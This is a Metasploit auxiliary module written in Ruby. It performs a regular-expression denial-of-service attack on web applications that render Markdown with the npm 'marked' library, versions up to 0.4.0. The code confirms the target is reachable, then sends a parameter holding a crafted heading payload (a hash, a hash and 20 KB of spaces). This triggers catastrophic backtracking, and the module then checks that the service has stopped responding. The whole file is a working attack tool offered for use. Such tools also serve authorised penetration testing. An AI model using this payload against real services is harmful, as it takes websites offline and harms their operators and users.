Path: blob/master/modules/auxiliary/dos/http/marked_redos.rb
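##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Dos

  # HTTP verbs for which send_request_cgi serialises a vars_* hash
  # (vars_get into the query string, vars_post into the body). With any
  # other verb HTTP_PARAMETER would be silently dropped from the request,
  # so those are rejected before anything is sent.
  SUPPORTED_METHODS = %w[GET POST].freeze

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'marked npm module "heading" ReDoS',
      'Description' => %q{
        This module exploits a Regular Expression Denial of Service vulnerability
        in the npm module "marked". The vulnerable portion of code that this module
        targets is in the "heading" regular expression. Web applications that use
        "marked" for generating html from markdown are vulnerable. Versions up to
        0.4.0 are vulnerable.
      },
      'References' =>
        [
          ['URL', 'https://blog.sonatype.com/cve-2017-17461-vulnerable-or-not'],
          ['CWE', '400']
        ],
      'Author' =>
        [
          'Adam Cazzolla, Sonatype Security Research',
          'Nick Starke, Sonatype Security Research'
        ],
      'License' => MSF_LICENSE
    ))

    register_options([
      Opt::RPORT(80),
      OptString.new('HTTP_METHOD', [true, 'The default HTTP Verb to use', 'GET']),
      OptString.new('HTTP_PARAMETER', [true, 'The vulnerable HTTP parameters', '']),
      OptString.new('TARGETURI', [true, 'The URL Path to use', '/'])
    ])
  end

  # Entry point. Validates HTTP_METHOD, confirms the target answers a
  # harmless probe, sends the ReDoS request, then probes again to report
  # whether the target has stopped responding.
  def run
    method = http_method
    unless SUPPORTED_METHODS.include?(method)
      fail_with(Failure::BadConfig, "HTTP_METHOD must be one of #{SUPPORTED_METHODS.join(', ')}; got '#{method}'.")
    end

    unless test_service
      fail_with(Failure::Unreachable, "#{peer} - Could not communicate with service.")
    end

    trigger_redos
    test_service_unresponsive
  end

  # Sends the request carrying the heading payload in HTTP_PARAMETER.
  # No response (nil) or a timeout is the expected outcome; an actual HTTP
  # response means the target processed the request normally and the module
  # aborts.
  def trigger_redos
    method = http_method
    print_status("Sending ReDoS request to #{peer}.")

    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path),
      'method' => method,
      "vars_#{method.downcase}" => {
        datastore['HTTP_PARAMETER'] => "# #" + (" " * 20 * 1024) + Rex::Text.rand_text_alpha(1)
      }
    )

    if res
      fail_with(Failure::Unknown, "ReDoS request unsuccessful. Received status #{res.code} from #{peer}.")
    end

    print_status("No response received from #{peer}, service is most likely unresponsive.")
  rescue ::Rex::ConnectionError
    # Rex::ConnectionError covers ConnectionRefused as well as
    # ConnectionTimeout and HostUnreachable; the latter two used to
    # propagate out of the module as an unhandled exception.
    print_error("Unable to connect to #{peer}.")
  rescue ::Timeout::Error
    print_status("No HTTP response received from #{peer}, this indicates the payload was successful.")
  end

  # Re-probes the target with a GET to a random path and reports whether
  # it still answers.
  def test_service_unresponsive
    print_status('Testing for service unresponsiveness.')

    if probe_service.nil?
      print_good('Service not responding.')
    else
      print_error('Service responded with a valid HTTP Response; ReDoS attack failed.')
    end
  rescue ::Rex::ConnectionError
    # A failed connect is a known condition, not an "unknown error"; report
    # it the same way the other methods do.
    print_error("Unable to connect to #{peer}.")
  rescue ::Timeout::Error
    print_good('HTTP request timed out, most likely the ReDoS attack was successful.')
  end

  # Sends a GET to a random path and returns true only when the target
  # answers with a 1xx-4xx status (a 404 for the random path still proves
  # the service is up). Returns false on no response, a 5xx, or a failed
  # connection.
  def test_service
    print_status('Testing Service to make sure it is working.')

    res = probe_service
    return false unless res && res.code >= 100 && res.code < 500

    print_status("Test request successful, attempting to send payload. Server returned #{res.code}")
    true
  rescue ::Rex::ConnectionError
    print_error("Unable to connect to #{peer}.")
    false
  end

  private

  # HTTP_METHOD normalised to upper case so 'post' and 'POST' behave alike,
  # both as the request verb and when deriving the vars_* key.
  def http_method
    datastore['HTTP_METHOD'].to_s.upcase
  end

  # Plain GET to a random 8-character path under the web root. Returns the
  # HTTP response, or nil when send_request_cgi got no answer.
  def probe_service
    send_request_cgi(
      'uri' => '/' + Rex::Text.rand_text_alpha(8),
      'method' => 'GET'
    )
  end
end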